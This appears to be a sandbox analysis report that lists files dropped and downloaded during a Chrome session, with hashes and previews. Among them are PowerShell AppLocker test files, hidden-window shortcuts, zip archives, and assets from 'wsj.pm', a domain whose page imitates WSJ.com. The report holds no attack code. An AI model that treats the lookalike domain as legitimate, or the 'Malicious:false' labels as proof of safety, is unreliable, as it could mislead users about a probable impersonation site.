                                                                                                                Preview:[Thu Apr 25 16:59:59 2024] Log File is located under: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814750931222528]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814750931288064]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751014977536]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751015043072]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751096504320]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751096569856]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751232425984]..[Thu Apr 25 16:59:59 2024]{1592d} App::OnFileActivated: Activated via file..[Thu Apr 25 16:59:59 2024]{1592d} RegisterBackgroundTask -> Checking if Background Task is al
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.9912596335072044
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:80/2djTA7lxSHFidAKZdA1JehwiZUklqehRdy+3:8aK8xkwdy
                                                                                                                MD5:5432204821475E4BD59C76D445540F47
                                                                                                                SHA1:000B5ACDFDB4271A8CA2C92E64E9D1FBDDC6561E
                                                                                                                SHA-256:20409874122269AD699424569A2695981B7898AF55CA0EEA217DE089F4E553EE
                                                                                                                SHA-512:368FBD0A7D0C4718260849D59076CDF3EEC7334E427187231AA200597A5FDD81D6BE1FD0A83EBE24E09AC20722852C5FAB8504EEC8A40CC74C2D34FE65089A20
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2679
                                                                                                                Entropy (8bit):4.00834461831796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8X2djTA7lxSHFidAKZdA10eh/iZUkAQkqehgdy+2:8XK8xm9Q/dy
                                                                                                                MD5:8C8879202D6D7BAAB1D1B84D02BDE6A3
                                                                                                                SHA1:C1886284F1A1A0C625E33366C035598B27F21324
                                                                                                                SHA-256:9351FB8D231F61E6D1BD402E5C8C36A1701E915E06CB4D15667A494A4837B716
                                                                                                                SHA-512:157E7F4DFB3D80EFB1FC152674E0D8803ECC16738BFE14FC30EDA62C25205D71C9598B5D10B55155AEA34D037C1E3E188BF650EA84C0D8DF4CB7160AFBA46D32
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2693
                                                                                                                Entropy (8bit):4.0168175814113924
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8e2djTA7ljHFidAKZdA14tIeh7sFiZUkmgqeh7sGdy+BX:8eK8Fncdy
                                                                                                                MD5:F2ACEF85CD2ED937108B43BC582E7CD3
                                                                                                                SHA1:64CD732C32E6A893209B0DAC2995BACFD95D82B0
                                                                                                                SHA-256:4CAB858F89575FE7D4C5684BA43F8446161E96E40CDD36925E50F725C986D0D8
                                                                                                                SHA-512:FA98571876EA0A02A65596D6007CD979A7EDE97A43FD8AF333F94396258EF3EA1FC53F4736D5746F51C90856D1455C26D90ECED61B52A748424956DE044C63C4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):4.007256157814389
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:872djTA7lxSHFidAKZdA1behDiZUkwqehEdy+R:87K8x9udy
                                                                                                                MD5:AC98DF820A5239BDDD79875389AAD496
                                                                                                                SHA1:7C1DEDDDE18EDE5DBD24C7BF3EC72FACCA6F4226
                                                                                                                SHA-256:BB722FAB80126576BA0DBC0BBBACB23FF048C6E639C81538759DD2E0805A8189
                                                                                                                SHA-512:662B51AF009CAC57CE4150ED533F7075C55E1BDFB9704CBA8EDC74081FB4535BE03063B5F50A465AB78165FA40CEFF65DA01F551E6F087917AD96FE1B1EE11BD
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):3.994628813512041
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8M2djTA7lxSHFidAKZdA1VehBiZUk1W1qehCdy+C:8MK8xd9idy
                                                                                                                MD5:DB79187BC7CD179552045BA73E873F6E
                                                                                                                SHA1:84C5C75BAD6489D96CAC543D579139254AFCF2D7
                                                                                                                SHA-256:C1F4036907C78C56E0E18B85C94F94B0D9FD1BDA16EC1C2412AD8E1F3BB73792
                                                                                                                SHA-512:B4468506FFB5E818FB8905766CE2BF23101A4D8A480E26FD33008E9F90426576822A8399EB44DD47DA13F8FE08BF370BAA38C84D5E5531BEC2819370200A65D1
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2683
                                                                                                                Entropy (8bit):4.00655702083067
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8fi2djTA7lxSHFidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbcdy+yT+:8fiK8xtTTTbxWOvTbcdy7T
                                                                                                                MD5:B9890B755AE8885CB7E4A789F990C739
                                                                                                                SHA1:E6F9E83B9990EF23EE95F0B951366C5B8CFB30B4
                                                                                                                SHA-256:7CAC02D0F2523265DAE8385A1BE51E08FAF0CB00FBB5C4644BCFBF364B37CD9C
                                                                                                                SHA-512:451593B910C9C38A90305D000920C356A8C3D2236CB38F9843A31828567BDFC1E5D94648D5775F49E1BC2412CECE1E5DAF0CD6DDE86CA27B368228BEF3AD53E7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32513
                                                                                                                Entropy (8bit):7.986736145523285
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:671h8v/m+YqjoFGyBs32tsFauzgHNUwsv8nUZ0O:67Agqv0SF3zgHyv8ng
                                                                                                                MD5:B17685772BE648FB024AEFAD002B342D
                                                                                                                SHA1:7D78E2BE539BA76A6DA46E47F5C8AE09163FF269
                                                                                                                SHA-256:4E123C220BDEC495617D51397838F53B3C60B750510C75DCA119577D41E4CA81
                                                                                                                SHA-512:6CEF94613C535CB0D6F44775DC67A1A5E7AE56B35C73204A3E9AF9E712F3784F7B2287CC335A1E8F31E7555599C3E6545BE67D2D43784937069E73082CFBC6C1
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1064965
                                                                                                                Entropy (8bit):7.997699899695652
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:24576:/nGpZCSOG9vMctFkyggn+Qce6X/di+J72iPgnrT:epkzG99tFkyLkei/8+J71IH
                                                                                                                MD5:2BCB8F589CA7F5910883DAD50B7E11DF
                                                                                                                SHA1:9A29D41B5AFEC950F90DAEF45762455C47B7098D
                                                                                                                SHA-256:F015DA1F2ADA32F734B81AA282BEA62840CD84AFAA353CA52D5E2D0C82E705D1
                                                                                                                SHA-512:4E731C5C66BD590D83D10541AB4DCC4717A12067ABBC353790B4FB5E6FFFA854C1C29784F7D9903C58DBF8D730A556AD12CB4CDFB6A48A2420431E3E7E1DFB0C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 4 icons, 64x64, 8 bits/pixel, 48x48, 8 bits/pixel
                                                                                                                Category:dropped
                                                                                                                Size (bytes):13094
                                                                                                                Entropy (8bit):4.576028578695119
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:YhMLi659RUz8oFQV6P6z/B8tCifom3RQwgVCOYgLKuam8ArAVw56LC/zjfcqf9SE:YhM+Zz8YI6PAaCsomBQw9OgGq27gqfF
                                                                                                                MD5:14A1E4EF44C0757C4381FBE3763701B0
                                                                                                                SHA1:FC6976A0F023BB3F4C0DBF9B2DFD1DFB28D11537
                                                                                                                SHA-256:307EBAA6F26198D5065D01BD55A106CE61F4346C5DBE48DDCE137F7644EA6BF2
                                                                                                                SHA-512:93CD089018A5E6CB14F9BAA1404B68DA69C682DF2AC38460D4DDB06B0BC5A7EA1C6CE8F984C24827C624E9522AE54DAC27EEBBAF88DBEDF096FAF2B6284AE14A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 287x191, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):9586
                                                                                                                Entropy (8bit):7.955142632385518
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:nQPdQF3ztHakymnpTHy4BpC7DFvuP6Aq5bhyqIrokvFWHM7BW8:UgzymnpTSiC3FvuPGbhLILFoQf
                                                                                                                MD5:25CE6FA9798693A805D126956321CA82
                                                                                                                SHA1:3D1DDAE0DE494326B82E7056B371277630AB3634
                                                                                                                SHA-256:6D14CAE3C1B8D3710C1774DA1130CDE2EFC6DF295525A01BA81259583648CFF8
                                                                                                                SHA-512:0AD60AA52ABAC239A6874BD16298243A668DEF78C3E8005CDAE043D3AD56DA0086687380F1D92F8C900711223AE0DC7B6770695A6B4F670BE7F714369439F825
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-948848.jpeg
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 4 icons, 64x64, 8 bits/pixel, 48x48, 8 bits/pixel
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):13094
                                                                                                                Entropy (8bit):4.576028578695119
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:YhMLi659RUz8oFQV6P6z/B8tCifom3RQwgVCOYgLKuam8ArAVw56LC/zjfcqf9SE:YhM+Zz8YI6PAaCsomBQw9OgGq27gqfF
                                                                                                                MD5:14A1E4EF44C0757C4381FBE3763701B0
                                                                                                                SHA1:FC6976A0F023BB3F4C0DBF9B2DFD1DFB28D11537
                                                                                                                SHA-256:307EBAA6F26198D5065D01BD55A106CE61F4346C5DBE48DDCE137F7644EA6BF2
                                                                                                                SHA-512:93CD089018A5E6CB14F9BAA1404B68DA69C682DF2AC38460D4DDB06B0BC5A7EA1C6CE8F984C24827C624E9522AE54DAC27EEBBAF88DBEDF096FAF2B6284AE14A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/favicon.ico
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 110x62, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):3217
                                                                                                                Entropy (8bit):7.863271626454483
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:O8N0J4lnCv7UjsmyllF8lhJSWJDCFN28bnNHMO+:OM0WRjsjln8lhJlJaTbnFZ+
                                                                                                                MD5:7BAF32D64415A8E528351FD3ED41A17C
                                                                                                                SHA1:D10F019DA7E91FBB10B3AC97527DAA8F14040EDB
                                                                                                                SHA-256:B6C0551166BB49DA210D4C762E9BBE954E6B0E84112BCDA05C3BF7D1D356C018
                                                                                                                SHA-512:B6969B797A4E1868BDA2E611143B112263D476900BF64AA5D0A8CA85E13BA75D2F3342FE32C99974C92A919D6F5A91354DF4418788DB2A5F54395EB7658328B7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949113.jpeg
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 110 x 62, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):21892
                                                                                                                Entropy (8bit):7.981012051227347
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:AAOaWsmquqNH2D+QnjYmR9nEuCknDj6Wlke3NtAT/Df/b5L6ZHvXoWToO2p/w6q:ld/uqED1j3DnEHzFuC3f/bwZP4KZ
                                                                                                                MD5:C0D70F65DBDAA013E2DC79DF3BBE656A
                                                                                                                SHA1:332488A7515510658B6B0E81E439CDBECD48282E
                                                                                                                SHA-256:E4C4E1E817ED689070DDF3A80452B5B8CD0407DC495145D2143603EBFAB1FE69
                                                                                                                SHA-512:1408DE608CD1CC07EC7A5D4B6804C6F120E43F28E80CF2C8935951E24BBBD4975BF34A8A72BD8D0DF81E7D9F6109C72EBFAABD8E62A86E8056BF63AA3AE0EBE2
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-948629.png
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 220x220, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):19278
                                                                                                                Entropy (8bit):7.955056509183606
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:P1uLxSxDqCD9H7ol7hMsIJ8ma+fxyDkjSzv2GuM7yqOQEzaDlGATI:tmShqsH0li8m/59WvLuM77Ezt/
                                                                                                                MD5:1E7CBBB9A79C65F967FDC172715AB05D
                                                                                                                SHA1:B7D651316ACF3BB2B79BD668861E273C9D5D69B8
                                                                                                                SHA-256:E9334EA9DD833D3CB2DD39DC0C6D6FCF044170D7B92031820B2FF234BB3B4348
                                                                                                                SHA-512:C96B05DC36B325FF926DD222E22D8908DD03A9338C3D6E12672F2BFB0B4ED608C1EF2B0C0F02117637C28CAE28DE329DEDF4DF2D07E5A0DCFD7683322970FF67
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):23
                                                                                                                Entropy (8bit):3.6211755429194716
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:YM0uRn:YM0uR
                                                                                                                MD5:8183B9A40CF91DC91EE64E402122F07C
                                                                                                                SHA1:3F2EAD7013B407FC83ECFDB34B2120003D88982A
                                                                                                                SHA-256:B3849D6557B393391A2530A78375643A147278269DB19B8855798A1DEC085E53
                                                                                                                SHA-512:2B2BD2D0F215820ED342BA8E6766EE2B97CC0CD215831FFC587F83A8E4D47AEA23DADF7C1EB6CF8388E6CF4FB77DFA82BDB06115B05437EFA4A94C2ADED08E77
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://api.ipify.org/?format=json
                                                                                                                Preview:{"ip":"185.152.66.230"}
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):6475
                                                                                                                Entropy (8bit):4.957213986967474
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:dWdNI6wvTaqU8aPqF3MqSfotMqLmnESFwUp6NIBbTv15usrdlyKMihexJRSoUgvw:dWrjIoYBSeUp6CBbTvTuk0lvkLES
                                                                                                                MD5:4699F3C28A26DE50BDE7EB2E516C4616
                                                                                                                SHA1:6792A6F7034F97C1E99468CA66751C6BC27C3838
                                                                                                                SHA-256:F173CE9ABA85239293AA2D30B59D8E9769AB57261A63376147B22773F84972BB
                                                                                                                SHA-512:F63F326AB97104B019158A3BCFAF74716366F358209431BC087D11D057896FA66A2E51490AF8843F0E2EE432D1340A700D42482E95D6E1514387DDEE61641CF8
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/google-play.4699f3c2.svg
                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 115.8 27.3"><g display="none"><path display="inline" d="M120,33.2H-5c-2.8,0-5-2.2-5-5v-30c0-2.8,2.2-5,5-5h125c2.8,0,5,2.2,5,5v30C125,31,122.8,33.2,120,33.2z"/></g><g><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M37.4,3.5c0,0.8-0.2,1.5-0.7,2c-0.6,0.6-1.3,0.9-2.2,0.9c-0.9,0-1.6-0.3-2.2-0.9c-0.6-0.6-0.9-1.3-0.9-2.2 c0-0.9,0.3-1.6,0.9-2.2c0.6-0.6,1.3-0.9,2.2-0.9c0.4,0,0.8,0.1,1.2,0.3c0.4,0.2,0.7,0.4,0.9,0.7l-0.5,0.5c-0.4-0.5-0.9-0.7-1.6-0.7 c-0.6,0-1.2,0.2-1.6,0.7c-0.5,0.4-0.7,1-0.7,1.7s0.2,1.3,0.7,1.7c0.5,0.4,1,0.7,1.6,0.7c0.7,0,1.2-0.2,1.7-0.7 c0.3-0.3,0.5-0.7,0.5-1.2h-2.2V3h2.9C37.4,3.2,37.4,3.3,37.4,3.5z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M42.1,1h-2.7v1.9h2.5v0.7h-2.5v1.9h2.7v0.7h-3.5v-6h3.5V1z"/><path fill="#FFFFFF" stroke="#FFFFFF" stroke-width="0.2" stroke-miterlimit="10" d="M45.3,6.2h-0.8V1h-1.7V0.2H47V1h-1.7V6.2z"/><path fill="#FFFFFF" stroke
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 220x220, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):19278
                                                                                                                Entropy (8bit):7.955056509183606
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:P1uLxSxDqCD9H7ol7hMsIJ8ma+fxyDkjSzv2GuM7yqOQEzaDlGATI:tmShqsH0li8m/59WvLuM77Ezt/
                                                                                                                MD5:1E7CBBB9A79C65F967FDC172715AB05D
                                                                                                                SHA1:B7D651316ACF3BB2B79BD668861E273C9D5D69B8
                                                                                                                SHA-256:E9334EA9DD833D3CB2DD39DC0C6D6FCF044170D7B92031820B2FF234BB3B4348
                                                                                                                SHA-512:C96B05DC36B325FF926DD222E22D8908DD03A9338C3D6E12672F2BFB0B4ED608C1EF2B0C0F02117637C28CAE28DE329DEDF4DF2D07E5A0DCFD7683322970FF67
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/AM.jpeg
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1674
                                                                                                                Entropy (8bit):4.85356911231215
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:S/ogq9pFrd7YDGJnxF68dBSfC1Cn40Rzy:S/XKFrFF6U8fSw40Rzy
                                                                                                                MD5:7684A6D7DD159866BF45008ABF42F42A
                                                                                                                SHA1:1674C5B99E92EF75D26C2EFEAD395769DCCBF68E
                                                                                                                SHA-256:8D3C87F86E88911EF10AFF9B0AD8F652883A6CDA2A1B17169983EF19DD6FB6F3
                                                                                                                SHA-512:A83CCA21292A4E9CFAB7CA4C2188352E6A4E815DED92931232F97AD28CA13F3483DF4C2986392546EA2D2F26DA48492F3603AB6B4776EDDAAA82B49DA9177D11
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/style.css
                                                                                                                Preview:.centered-link {.. position: absolute;.. display: flex;.. align-items: center;.. justify-content: center;.. font-size: 22px;.. z-index: 1111;.. width: 100%;.. height: 100%;.. font-weight: 700;.. text-align: center;.. text-transform: uppercase;..}...pop-up {.. position: fixed;.. background-color: rgba(0,0,0,0.8);.. width: 100%;.. height: 100%;.. display: flex;.. justify-content: center;.. align-items: center;.. z-index: 10000;..}...pop-up__wrapper h2 {.. font-size: 40px;.. margin-bottom: 20px;..}...pop-up__wrapper span {.. font-weight: 700;..}...pop-up__wrapper p {.. font-weight: 400;.. margin-bottom: 40px;..}...pop-up__wrapper {.. position: fixed;.. font-family: inherit;.. top: 20%;.. max-width: 700px;.. /* transform: translate(-50%, -50%); */.. background-color: #fff;.. padding: 40px 50px 40px 50px;.. font-size: 22px;.. font-weight: 700;.. /* animation: pulse 2s infinite; */..}...centered-link-
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 220 x 220, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):50600
                                                                                                                Entropy (8bit):7.982273521260046
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:D22uLgbSATuk1CQuaS9Ow15EmS82+fk5IqImN5mPv01K:D22uLgbgksQuaNGEmHgdImNbo
                                                                                                                MD5:53786BE73B415DF9E5C3F76D49C1C1AA
                                                                                                                SHA1:CA8EB138A7539B0F597A3E69FE6589C3E84813C6
                                                                                                                SHA-256:AFF5B236949464B3D3A2C40C8352DEEFEE45C1ED2FE071AE3C47DE0C423A3F6F
                                                                                                                SHA-512:93855748EC8AFCA9B6CD6E28202F38440042D757D06B6D2233CE7BA90A9D44C528CD681E84FCD4F032F91CDE46C84893E20D4192DCF7A1CAD3F491AAE88BE65A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/AM.png
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 47552, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):47552
                                                                                                                Entropy (8bit):7.995142931287489
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:JHfroyWqvnf+FZ/GyKkOdrbXaPXacB26bzuMZGMJim5Xe3KFjP5XAXSZrYWlkDPI:5royxvnQtGyKkOdLaPv26bzuoXeaFjBD
                                                                                                                MD5:87AE136546F1829642C68AA7D5BCA0D4
                                                                                                                SHA1:41A5C65092A2BA75F4021BACB3C18686545E9CB1
                                                                                                                SHA-256:27FD73DEE5596813BBD6282A821926AE6CD1281F9736D98943A1DEB6955608EE
                                                                                                                SHA-512:A124A0D656D40E9AA035774D5158F87E9E77C227E5E7BA1982253A409B28542BC3F15385223C9ED70419E0B26CE7F2D0848EE3CB7ADE4438494A7D77BFA8534E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/Retina-Medium.woff2
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (486)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1091908
                                                                                                                Entropy (8bit):3.3259444489982144
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:g7WjwogcrU1uNjRLaXiYdNQiyebgifXX/v:g7WjwogcrU1uNVaX9eiyebgifH/v
                                                                                                                MD5:A178CDB1878275B2587AA9872D949C04
                                                                                                                SHA1:AD0765C11F1B13900287FAF52AAD76BDBCEFA38B
                                                                                                                SHA-256:04485F608B4550E0CFC442ECA69F25E32F750B001FE97336609E507719178C81
                                                                                                                SHA-512:676BA109FEB73FDC49C17E75E47FDDE81FEDF633DD5C4A68CDA13D92E4C649CE89DB299FD72C224575452F9FA4386D989DA6B6D133308EF2C6D1EDF4805FBF11
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/
                                                                                                                Preview:<!DOCTYPE html>.<html lang=en>..<head>. <meta charset="UTF-8">. <meta name="description". content="Breaking news and analysis from the U.S. and around the world at WSJ.com. Politics, Economics, Markets, Life & Arts, and in-depth reporting." />. <meta itemprop="image" content="/img/wsj-social-share.png" />. <style>. @font-face {. font-family: "Retina";. src: url("/fonts/woffs/retina/Retina-Book.woff2") format("woff2"), url("/fonts/woffs/retina/Retina-Book.woff") format("woff");. font-style: normal;. font-weight: 400;. font-display: optional;. }.. @font-face {. font-family: "Retina";. src: url("/fonts/woffs/retina/Retina-BookItalic.woff2") format("woff2"), url("/fonts/woffs/retina/Retina-BookItalic.woff") format("woff");. font-style: italic;. font-weight: 400;. font-display: optional;. }.. @font-face {. font-family:
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6475
                                                                                                                Entropy (8bit):4.957213986967474
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:dWdNI6wvTaqU8aPqF3MqSfotMqLmnESFwUp6NIBbTv15usrdlyKMihexJRSoUgvw:dWrjIoYBSeUp6CBbTvTuk0lvkLES
                                                                                                                MD5:4699F3C28A26DE50BDE7EB2E516C4616
                                                                                                                SHA1:6792A6F7034F97C1E99468CA66751C6BC27C3838
                                                                                                                SHA-256:F173CE9ABA85239293AA2D30B59D8E9769AB57261A63376147B22773F84972BB
                                                                                                                SHA-512:F63F326AB97104B019158A3BCFAF74716366F358209431BC087D11D057896FA66A2E51490AF8843F0E2EE432D1340A700D42482E95D6E1514387DDEE61641CF8
                                                                                                                Malicious:false
                                                                                                                Reputation:low
